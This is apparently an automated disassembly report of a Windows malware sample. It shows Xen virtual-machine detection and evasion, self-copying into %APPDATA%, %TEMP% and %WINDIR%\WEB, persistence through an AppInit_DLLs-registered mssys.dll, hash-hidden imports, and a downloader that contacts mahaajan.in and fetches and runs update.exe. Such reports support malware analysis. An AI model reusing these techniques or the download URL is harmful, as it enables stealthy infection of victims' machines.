00412F6B mov cl, byte ptr [004120BEh] 00
00412F71 mov byte ptr [ebp-00000582h], cl
00412F77 lea edx, dword ptr [ebp-00000590h]
00412F7D push edx
00412F7E call 00413380h
00412F83 add esp, 04h
00412F86 movzx eax, al
00412F89 test eax, eax
00412F8B je 00412F94h
00412F8D mov al, 01h
00412F8F jmp 004132D3h
00412F94 mov ecx, dword ptr [004120C0h] ASCII "HARDWARE\ACPI\DSDT" xrefs 00412F8B
00412F9A mov dword ptr [ebp-00000580h], ecx
00412FA0 mov edx, dword ptr [004120C4h] 45524157
00412FA6 mov dword ptr [ebp-0000057Ch], edx
00412FAC mov eax, dword ptr [004120C8h] 5043415C
00412FB1 mov dword ptr [ebp-00000578h], eax
00412FB7 mov ecx, dword ptr [004120CCh] 53445C49
00412FBD mov dword ptr [ebp-00000574h], ecx
00412FC3 mov dx, word ptr [004120D0h] 5444
00412FCA mov word ptr [ebp-00000570h], dx
00412FD1 mov al, byte ptr [004120D2h] 00
00412FD6 mov byte ptr [ebp-0000056Eh], al
00412FDC push 00000051h
00412FDE push 00000000h
00412FE0 lea ecx, dword ptr [ebp-0000056Dh]
00412FE6 push ecx
00412FE7 call 00415F8Fh
00412FEC add esp, 0Ch
00412FEF mov edx, dword ptr [004120D4h] ASCII "HARDWARE\ACPI\FADT"
00412FF5 mov dword ptr [ebp-0000051Ch], edx
00412FFB mov eax, dword ptr [004120D8h] 45524157
00413000 mov dword ptr [ebp-00000518h], eax
00413006 mov ecx, dword ptr [004120DCh] 5043415C
0041300C mov dword ptr [ebp-00000514h], ecx
00413012 mov edx, dword ptr [004120E0h] 41465C49
00413018 mov dword ptr [ebp-00000510h], edx
0041301E mov ax, word ptr [004120E4h] 5444
00413024 mov word ptr [ebp-0000050Ch], ax
0041302B mov cl, byte ptr [004120E6h] 00
00413031 mov byte ptr [ebp-0000050Ah], cl
00413037 push 00000051h
00413039 push 00000000h
0041303B lea edx, dword ptr [ebp-00000509h]
00413041 push edx
00413042 call 00415F8Fh
00413047 add esp, 0Ch
0041304A mov eax, dword ptr [004120E8h] ASCII "HARDWARE\ACPI\RSDT"
0041304F mov dword ptr [ebp-000004B8h], eax
00413055 mov ecx, dword ptr [004120ECh] 45524157
0041305B mov dword ptr [ebp-000004B4h], ecx
00413061 mov edx, dword ptr [004120F0h] 5043415C
00413067 mov dword ptr [ebp-000004B0h], edx
0041306D mov eax, dword ptr [004120F4h] 53525C49
00413072 mov dword ptr [ebp-000004ACh], eax
00413078 mov cx, word ptr [004120F8h] 5444
0041307F mov word ptr [ebp-000004A8h], cx
00413086 mov dl, byte ptr [004120FAh] 00
0041308C mov byte ptr [ebp-000004A6h], dl
00413092 push 00000051h
00413094 push 00000000h
00413096 lea eax, dword ptr [ebp-000004A5h]
0041309C push eax
0041309D call 00415F8Fh
004130A2 add esp, 0Ch
004130A5 mov ecx, 00000007h
004130AA mov esi, 004120FCh ASCII "SYSTEM\ControlSet001\Services"
004130AF lea edi, dword ptr [ebp-00000454h]
004130B5 rep movsd
004130B7 movsw
004130B9 push 00000046h
004130BB push 00000000h
004130BD lea ecx, dword ptr [ebp-00000436h]
004130C3 push ecx
004130C4 call 00415F8Fh
004130C9 add esp, 0Ch
004130CC mov edx, dword ptr [0041211Ch] ASCII "Xen"
004130D2 mov dword ptr [ebp-000003F0h], edx
004130D8 push 00000060h
004130DA push 00000000h
004130DC lea eax, dword ptr [ebp-000003ECh]
004130E2 push eax
004130E3 call 00415F8Fh
004130E8 add esp, 0Ch
004130EB mov cl, byte ptr [0041199Bh] 00
004130F1 mov byte ptr [ebp-0000038Ch], cl
004130F7 push 00000063h
004130F9 push 00000000h
004130FB lea edx, dword ptr [ebp-0000038Bh]
00413101 push edx
00413102 call 00415F8Fh
00413107 add esp, 0Ch
0041310A mov al, byte ptr [0041199Fh] 00
0041310F mov byte ptr [ebp-00000328h], al
00413115 push 00000063h
00413117 push 00000000h
00413119 lea ecx, dword ptr [ebp-00000327h]
0041311F push ecx
00413120 call 00415F8Fh
00413125 add esp, 0Ch
00413128 mov dl, byte ptr [004119A3h] 00
0041312E mov byte ptr [ebp-000002C4h], dl
00413134 push 00000063h
00413136 push 00000000h
00413138 lea eax, dword ptr [ebp-000002C3h]
0041313E push eax
0041313F call 00415F8Fh
00413144 add esp, 0Ch
00413147 mov cl, byte ptr [004119A7h] 00
0041314D mov byte ptr [ebp-00000260h], cl
00413153 push 00000063h
00413155 push 00000000h
00413157 lea edx, dword ptr [ebp-0000025Fh]
0041315D push edx
0041315E call 00415F8Fh
00413163 add esp, 0Ch
00413166 mov eax, dword ptr [00412120h] ASCII "xenevtchn"
0041316B mov dword ptr [ebp-000001FCh], eax
00413171 mov ecx, dword ptr [00412124h] 68637476
00413177 mov dword ptr [ebp-000001F8h], ecx
0041317D mov dx, word ptr [00412128h] 006E
00413184 mov word ptr [ebp-000001F4h], dx
0041318B push 0000005Ah
0041318D push 00000000h
0041318F lea eax, dword ptr [ebp-000001F2h]
00413195 push eax
00413196 call 00415F8Fh
0041319B add esp, 0Ch
0041319E mov ecx, dword ptr [0041212Ch] ASCII "xennet"
004131A4 mov dword ptr [ebp-00000198h], ecx
004131AA mov dx, word ptr [00412130h] 7465
004131B1 mov word ptr [ebp-00000194h], dx
004131B8 mov al, byte ptr [00412132h] 00
004131BD mov byte ptr [ebp-00000192h], al
004131C3 push 0000005Dh
004131C5 push 00000000h
004131C7 lea ecx, dword ptr [ebp-00000191h]
004131CD push ecx
004131CE call 00415F8Fh
004131D3 add esp, 0Ch
004131D6 mov edx, dword ptr [00412134h] ASCII "xennet6"
004131DC mov dword ptr [ebp-00000134h], edx
004131E2 mov eax, dword ptr [00412138h] 00367465
004131E7 mov dword ptr [ebp-00000130h], eax
004131ED push 0000005Ch
004131EF push 00000000h
004131F1 lea ecx, dword ptr [ebp-0000012Ch]
004131F7 push ecx
004131F8 call 00415F8Fh
004131FD add esp, 0Ch
00413200 mov edx, dword ptr [0041213Ch] ASCII "xensvc"
00413206 mov dword ptr [ebp-000000D0h], edx
0041320C mov ax, word ptr [00412140h] 6376
00413212 mov word ptr [ebp-000000CCh], ax
00413219 mov cl, byte ptr [00412142h] 00
0041321F mov byte ptr [ebp-000000CAh], cl
00413225 push 0000005Dh
00413227 push 00000000h
00413229 lea edx, dword ptr [ebp-000000C9h]
0041322F push edx
00413230 call 00415F8Fh
00413235 add esp, 0Ch
00413238 mov eax, dword ptr [00412144h] ASCII "xenvdb"
0041323D mov dword ptr [ebp-6Ch], eax
00413240 mov cx, word ptr [00412148h] 6264
00413247 mov word ptr [ebp-68h], cx
0041324B mov dl, byte ptr [0041214Ah] 00
00413251 mov byte ptr [ebp-66h], dl
00413254 push 0000005Dh
00413256 push 00000000h
00413258 lea eax, dword ptr [ebp-65h]
0041325B push eax
0041325C call 00415F8Fh
00413261 add esp, 0Ch
00413264 xor ecx, ecx
00413266 mov word ptr [ebp-04h], cx
0041326A jmp 00413278h
0041326C mov dx, word ptr [ebp-04h] xrefs 004132AC
00413270 add dx, 0001h
00413274 mov word ptr [ebp-04h], dx
00413278 movzx eax, word ptr [ebp-04h] xrefs 0041326A
0041327C cmp eax, 03h
0041327F jnl 004132AEh
00413281 push 00000004h
00413283 lea ecx, dword ptr [ebp-000003F0h]
00413289 push ecx
0041328A movzx edx, word ptr [ebp-04h]
0041328E imul edx, edx, 64h
00413291 lea eax, dword ptr [ebp+edx-00000580h]
00413298 push eax
00413299 call 00413450h
0041329E add esp, 0Ch
004132A1 movzx ecx, al
004132A4 test ecx, ecx
004132A6 je 004132ACh
004132A8 mov al, 01h
004132AA jmp 004132D3h
004132AC jmp 0041326Ch xrefs 004132A6
004132AE push 00000004h xrefs 0041327F
004132B0 lea edx, dword ptr [ebp-000001FCh]
004132B6 push edx
004132B7 lea eax, dword ptr [ebp-00000454h]
004132BD push eax
004132BE call 00413450h
004132C3 add esp, 0Ch
004132C6 movzx ecx, al
004132C9 test ecx, ecx
004132CB je 004132D1h
004132CD mov al, 01h
004132CF jmp 004132D3h
004132D1 xor al, al xrefs 004132CB
004132D3 pop edi xrefs 004132CF, 004132AA, 00412F8F
004132D4 pop esi
004132D5 mov esp, ebp
004132D7 pop ebp
004132D8 ret function end
Strings
  • %APPDATA%, va: 00411C78
  • %TEMP%, va: 00411C84
  • %WINDIR%\WEB, va: 00411C8C
  • RT_RCDATA, va: 00411C9C
Address Instruction Meta Information
004147E0 push ebp xrefs 004161E4
004147E1 mov ebp, esp
004147E3 sub esp, 00000130h
004147E9 call 00415D00h
004147EE call 004122B0h
004147F3 movzx eax, al
004147F6 test eax, eax
004147F8 jne 0041482Ah
004147FA call 00412540h
004147FF movzx ecx, al
00414802 test ecx, ecx
00414804 jne 0041482Ah
00414806 call 004127E0h
0041480B movzx edx, al
0041480E test edx, edx
00414810 jne 0041482Ah
00414812 call 004129B0h
00414817 movzx eax, al
0041481A test eax, eax
0041481C jne 0041482Ah
0041481E call 00412F30h
00414823 movzx ecx, al
00414826 test ecx, ecx
00414828 je 00414831h
0041482A push 00000000h xrefs 004147F8, 00414804, 00414810, 0041481C
0041482C call 00414AA0h
00414831 push 00411C78h ASCII "%APPDATA%" xrefs 00414828
00414836 call 004145B0h
0041483B add esp, 04h
0041483E mov dword ptr [ebp-00000128h], eax
00414844 mov edx, dword ptr [ebp-00000128h]
0041484A push edx
0041484B call 00414630h
00414850 add esp, 04h
00414853 push 00411C84h ASCII "%TEMP%"
00414858 call 004145B0h
0041485D add esp, 04h
00414860 mov dword ptr [ebp-00000114h], eax
00414866 mov eax, dword ptr [ebp-00000114h]
0041486C push eax
0041486D call 00414630h
00414872 add esp, 04h
00414875 push 00411C8Ch ASCII "%WINDIR%\WEB"
0041487A call 004145B0h
0041487F add esp, 04h
00414882 mov dword ptr [ebp-00000124h], eax
00414888 mov ecx, dword ptr [ebp-00000124h]
0041488E push ecx
0041488F call 00414630h
00414894 add esp, 04h
00414897 call 00412190h
0041489C movzx edx, al
0041489F test edx, edx
004148A1 je 004148AAh
004148A3 push 00000000h
004148A5 call 00414AA0h
004148AA call 004146E0h xrefs 004148A1
004148AF push 00000104h
004148B4 lea eax, dword ptr [ebp-00000110h]
004148BA push eax
004148BB push 00000000h
004148BD call 00414220h
004148C2 push 00411C9Ch ASCII "RT_RCDATA"
004148C7 push 00000065h
004148C9 push 00000000h
004148CB call 00414AC0h
004148D0 mov dword ptr [ebp-00000120h], eax
004148D6 cmp dword ptr [ebp-00000120h], 00000000h
004148DD jne 004148E6h
004148DF xor eax, eax
004148E1 jmp 004149C4h
004148E6 mov ecx, dword ptr [ebp-00000120h] xrefs 004148DD
004148EC push ecx
004148ED push 00000000h
004148EF call 00414AF0h
004148F4 mov dword ptr [ebp-04h], eax
004148F7 mov edx, dword ptr [ebp-00000120h]
004148FD push edx
004148FE push 00000000h
00414900 call 00414B10h
00414905 mov dword ptr [ebp-0000011Ch], eax
0041490B cmp dword ptr [ebp-0000011Ch], 00000000h
00414912 jne 0041491Bh
00414914 xor eax, eax
00414916 jmp 004149C4h
0041491B mov eax, dword ptr [ebp-0000011Ch] xrefs 00414912
00414921 push eax
00414922 call 00414B30h
00414927 mov dword ptr [ebp-00000118h], eax
0041492D cmp dword ptr [ebp-00000118h], 00000000h
00414934 jne 0041493Dh
00414936 xor eax, eax
00414938 jmp 004149C4h
0041493D call 00414B80h xrefs 00414934
00414942 test eax, eax
00414944 je 00414973h
00414946 lea ecx, dword ptr [ebp-00000130h]
0041494C push ecx
0041494F push 00000000h Count = 2
00414951 push 00414DC0h
00414958 push 00000000h Count = 2
0041495A call 00414B50h
0041495F mov dword ptr [ebp-0000012Ch], eax
00414965 push FFFFFFFFh
00414967 mov edx, dword ptr [ebp-0000012Ch]
0041496D push edx
0041496E call 00414590h
00414977 push 00000000h Count = 3
00414979 push 00413ED0h
00414980 push 00000000h Count = 2
00414982 call 00414B50h
0041498B push 00000000h Count = 3
0041498D push 004153C0h
00414994 push 00000000h Count = 2
00414996 call 00414B50h
0041499B push 00000007h
0041499D push 00000000h
0041499F mov eax, dword ptr [ebp-04h]
004149A2 push eax
004149A3 mov ecx, dword ptr [ebp-00000118h]
004149A9 push ecx
004149AA call 004146A0h
004149AF add esp, 10h
004149B2 push eax
004149B3 lea edx, dword ptr [ebp-00000110h]
004149B9 push edx
004149BA call 00414290h
004149BF add esp, 08h
004149C2 xor eax, eax
004149C4 mov esp, ebp xrefs 00414938, 00414916, 004148E1
004149C6 pop ebp
004149C7 retn 0010h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCloseKey.ADVAPI32, ref: 004137A6
Address Instruction Meta Information
00413790 push ebp xrefs 00413555, 00413529, 00413543, 004147CA, 004135DD
00413791 mov ebp, esp
00413793 mov eax, dword ptr [ebp+08h]
00413796 push eax
00413797 push 647832FCh
0041379C push DB355534h
004137A1 call 00415E40h
004137A6 call eax RegCloseKey@ADVAPI32.DLL (Hidden Import)
004137A8 pop ebp
004137A9 retn 0004h function end
Strings
  • mssys.dll, va: 00411C10
  • %WINDIR%, va: 00411C1C
  • %s%s, va: 00411C28
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\, va: 00411C30
  • AppInit_DLLs, va: 00411C68
Address Instruction Meta Information
004146E0 push ebp xrefs 004148AA
004146E1 mov ebp, esp
004146E3 sub esp, 00000114h
004146E9 push 00411C10h ASCII "mssys.dll"
004146EE push 00411C1Ch ASCII "%WINDIR%"
004146F3 call 004145B0h
004146F8 add esp, 04h
004146FB push eax
004146FC push 00411C28h ASCII "%s%s"
00414701 lea eax, dword ptr [ebp-00000108h]
00414707 push eax
00414708 call 004141C0h
0041470D add esp, 10h
00414710 lea ecx, dword ptr [ebp-00000108h]
00414716 push ecx
00414717 call 004137E0h
0041471C neg eax
0041471E sbb eax, eax
00414720 add eax, 01h
00414723 cmp eax, FFFFFFFFh
00414726 je 00414768h
00414728 push 00000000h
0041472A push 00000004h
0041472C push 00000001h
00414730 push 00000000h Count = 2
00414732 push 40000000h
00414737 lea edx, dword ptr [ebp-00000108h]
0041473D push edx
0041473E call 00413F90h
00414743 mov dword ptr [ebp-00000114h], eax
00414749 push 00000000h
0041474B lea eax, dword ptr [ebp-00000110h]
00414751 push eax
00414752 push 00010600h
00414757 push 00401320h
0041475C mov ecx, dword ptr [ebp-00000114h]
00414762 push ecx
00414763 call 00413FF0h
00414768 mov dword ptr [ebp-0000010Ch], 00000000h xrefs 00414726
00414772 push 00000000h
00414774 lea edx, dword ptr [ebp-0000010Ch]
0041477A push edx
0041477B push 00000000h
0041477D push 000F003Fh
00414786 push 00000000h Count = 3
00414788 push 00411C30h ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
0041478D push 80000002h
00414792 call 00414A30h
00414797 lea eax, dword ptr [ebp-00000108h]
0041479D push eax
0041479E call 00415EDCh
004147A3 add esp, 04h
004147A6 push eax
004147A7 lea ecx, dword ptr [ebp-00000108h]
004147AD push ecx
004147AE push 00000001h
004147B0 push 00000000h
004147B2 push 00411C68h ASCII "AppInit_DLLs"
004147B7 mov edx, dword ptr [ebp-0000010Ch]
004147BD push edx
004147BE call 00414A70h
004147C3 mov eax, dword ptr [ebp-0000010Ch]
004147C9 push eax
004147CA call 00413790h
004147CF mov esp, ebp
004147D1 pop ebp
004147D2 ret function end
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCreateKeyExA.ADVAPI32, ref: 00414A66
Address Instruction Meta Information
00414A30 push ebp xrefs 00414792
00414A31 mov ebp, esp
00414A33 mov eax, dword ptr [ebp+28h]
00414A36 push eax
00414A37 mov ecx, dword ptr [ebp+24h]
00414A3A push ecx
00414A3B mov edx, dword ptr [ebp+20h]
00414A3E push edx
00414A3F mov eax, dword ptr [ebp+1Ch]
00414A42 push eax
00414A43 mov ecx, dword ptr [ebp+18h]
00414A46 push ecx
00414A47 mov edx, dword ptr [ebp+14h]
00414A4A push edx
00414A4B mov eax, dword ptr [ebp+10h]
00414A4E push eax
00414A4F mov ecx, dword ptr [ebp+0Ch]
00414A52 push ecx
00414A53 mov edx, dword ptr [ebp+08h]
00414A56 push edx
00414A57 push 647832FCh
00414A5C push 90A097E6h
00414A61 call 00415E40h
00414A66 call eax RegCreateKeyExA@ADVAPI32.DLL (Hidden Import)
00414A68 pop ebp
00414A69 retn 0024h function end
APIs
    • WSAStartup.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • WSACleanup.WS2_32, ref: 00414BDC
    • gethostbyname.WS2_32, ref: 00414BEE
    • WSACleanup.WS2_32, ref: 00414C03
    • htons.WS2_32, ref: 00414C10
    • inet_ntoa.WS2_32, ref: 00414C37
    • inet_addr.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • WSACleanup.WS2_32, ref: 00414C6D
  • send.WS2_32, ref: 00414E28
  • recv.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] send@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] recv@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
APIs
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
APIs
  • LoadLibraryA.KERNEL32, ref: 004158E6
Address Instruction Meta Information
00415760 push ebp xrefs 00415D37, 00415925, 00415E2B
00415761 mov ebp, esp
00415763 sub esp, 00000130h
00415769 mov eax, dword ptr [ebp+08h]
0041576C mov ecx, dword ptr [eax+3Ch]
0041576F mov edx, dword ptr [ebp+08h]
00415772 lea eax, dword ptr [edx+ecx+18h]
00415776 mov dword ptr [ebp-14h], eax
00415779 mov ecx, dword ptr [ebp-14h]
0041577C mov edx, dword ptr [ebp+08h]
0041577F add edx, dword ptr [ecx+60h]
00415782 mov dword ptr [ebp-10h], edx
00415785 mov dword ptr [ebp-08h], 00000000h
0041578C cmp dword ptr [ebp+10h], 00000000h
00415790 je 004157E5h
00415792 mov eax, dword ptr [ebp+10h]
00415795 movsx ecx, byte ptr [eax]
00415798 cmp ecx, 23h
0041579B jne 004157E5h
0041579D mov edx, dword ptr [ebp+10h] xrefs 004157C9
004157A0 add edx, 01h
004157A3 mov dword ptr [ebp+10h], edx
004157A6 mov eax, dword ptr [ebp+10h]
004157A9 movsx ecx, byte ptr [eax]
004157AC test ecx, ecx
004157AE je 004157CBh
004157B0 mov edx, dword ptr [ebp-08h]
004157B3 imul edx, edx, 0Ah
004157B6 mov dword ptr [ebp-08h], edx
004157B9 mov eax, dword ptr [ebp+10h]
004157BC movsx ecx, byte ptr [eax]
004157BF mov edx, dword ptr [ebp-08h]
004157C2 lea eax, dword ptr [edx+ecx-30h]
004157C6 mov dword ptr [ebp-08h], eax
004157C9 jmp 0041579Dh
004157CB mov ecx, dword ptr [ebp-10h] xrefs 004157AE
004157CE mov edx, dword ptr [ebp-08h]
004157D1 sub edx, dword ptr [ecx+10h]
004157D4 mov dword ptr [ebp-08h], edx
004157D7 mov eax, dword ptr [ebp-10h]
004157DA mov ecx, dword ptr [ebp-08h]
004157DD cmp ecx, dword ptr [eax+14h]
004157E0 jc 004157E3h
004157E2 int3
004157E3 jmp 00415851h xrefs 004157E0
004157E5 mov edx, dword ptr [ebp-10h] xrefs 00415790, 0041579B
004157E8 mov eax, dword ptr [ebp+08h]
004157EB add eax, dword ptr [edx+20h]
004157EE mov dword ptr [ebp-24h], eax
004157F1 mov ecx, dword ptr [ebp-10h]
004157F4 mov edx, dword ptr [ebp+08h]
004157F7 add edx, dword ptr [ecx+24h]
004157FA mov dword ptr [ebp-20h], edx
004157FD mov dword ptr [ebp-1Ch], 00000000h
00415804 jmp 0041580Fh
00415806 mov eax, dword ptr [ebp-1Ch] xrefs 00415843
00415809 add eax, 01h
0041580C mov dword ptr [ebp-1Ch], eax
0041580F mov ecx, dword ptr [ebp-10h] xrefs 00415804
00415812 mov edx, dword ptr [ebp-1Ch]
00415815 cmp edx, dword ptr [ecx+18h]
00415818 jnc 00415845h
0041581A mov eax, dword ptr [ebp-1Ch]
0041581D mov ecx, dword ptr [ebp-24h]
00415820 mov edx, dword ptr [ebp+08h]
00415823 add edx, dword ptr [ecx+eax*4]
00415826 push edx
00415827 call 00415710h
0041582C add esp, 04h
0041582F cmp eax, dword ptr [ebp+0Ch]
00415832 jne 00415843h
00415834 mov eax, dword ptr [ebp-1Ch]
00415837 mov ecx, dword ptr [ebp-20h]
0041583A movzx edx, word ptr [ecx+eax*2]
0041583E mov dword ptr [ebp-08h], edx
00415841 jmp 00415845h
00415843 jmp 00415806h xrefs 00415832
00415845 mov eax, dword ptr [ebp-10h] xrefs 00415818, 00415841
00415848 mov ecx, dword ptr [ebp-1Ch]
0041584B cmp ecx, dword ptr [eax+18h]
0041584E jne 00415851h
00415850 int3
00415851 mov edx, dword ptr [ebp-10h] xrefs 0041584E, 004157E3
00415854 mov eax, dword ptr [ebp+08h]
00415857 add eax, dword ptr [edx+1Ch]
0041585A mov dword ptr [ebp-18h], eax
0041585D mov ecx, dword ptr [ebp-08h]
00415860 mov edx, dword ptr [ebp-18h]
00415863 mov eax, dword ptr [ebp+08h]
00415866 add eax, dword ptr [edx+ecx*4]
00415869 mov dword ptr [ebp-0Ch], eax
0041586C mov ecx, dword ptr [ebp-0Ch]
0041586F cmp ecx, dword ptr [ebp+08h]
00415872 jne 00415875h
00415874 int3
00415875 mov edx, dword ptr [ebp-14h] xrefs 00415872
00415878 mov eax, dword ptr [edx+64h]
0041587B mov dword ptr [ebp-04h], eax
0041587E mov ecx, dword ptr [ebp-0Ch]
00415881 cmp ecx, dword ptr [ebp-10h]
00415884 jc 0041592Fh
0041588A mov edx, dword ptr [ebp-10h]
0041588D add edx, dword ptr [ebp-04h]
00415890 cmp dword ptr [ebp-0Ch], edx
00415893 jnc 0041592Fh
00415899 mov eax, dword ptr [ebp-0Ch]
0041589C mov dword ptr [ebp+10h], eax
0041589F mov dword ptr [ebp-28h], 00000000h
004158A6 mov ecx, dword ptr [ebp+10h] xrefs 004158D2
004158A9 movsx edx, byte ptr [ecx]
004158AC cmp edx, 2Eh
004158AF je 004158D4h
004158B1 mov eax, dword ptr [ebp-28h]
004158B4 mov ecx, dword ptr [ebp+10h]
004158B7 mov dl, byte ptr [ecx]
004158B9 mov byte ptr [ebp+eax-00000130h], dl
004158C0 mov eax, dword ptr [ebp-28h]
004158C3 add eax, 01h
004158C6 mov dword ptr [ebp-28h], eax
004158C9 mov ecx, dword ptr [ebp+10h]
004158CC add ecx, 01h
004158CF mov dword ptr [ebp+10h], ecx
004158D2 jmp 004158A6h
004158D4 mov edx, dword ptr [ebp-28h] xrefs 004158AF
004158D7 mov byte ptr [ebp+edx-00000130h], 00000000h
004158DF lea eax, dword ptr [ebp-00000130h]
004158E5 push eax
004158E6 call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
004158EC mov dword ptr [ebp+08h], eax
004158EF cmp dword ptr [ebp+08h], 00000000h
004158F3 jne 004158F6h
004158F5 int3
004158F6 mov ecx, dword ptr [ebp+10h] xrefs 004158F3
004158F9 add ecx, 01h
004158FC mov dword ptr [ebp+10h], ecx
004158FF mov edx, dword ptr [ebp+10h]
00415902 movsx eax, byte ptr [edx]
00415905 cmp eax, 23h
00415908 je 00415919h
0041590A mov ecx, dword ptr [ebp+10h]
0041590D push ecx
0041590E call 00415710h
00415913 add esp, 04h
00415916 mov dword ptr [ebp+0Ch], eax
00415919 mov edx, dword ptr [ebp+10h] xrefs 00415908
0041591C push edx
0041591D mov eax, dword ptr [ebp+0Ch]
00415920 push eax
00415921 mov ecx, dword ptr [ebp+08h]
00415924 push ecx
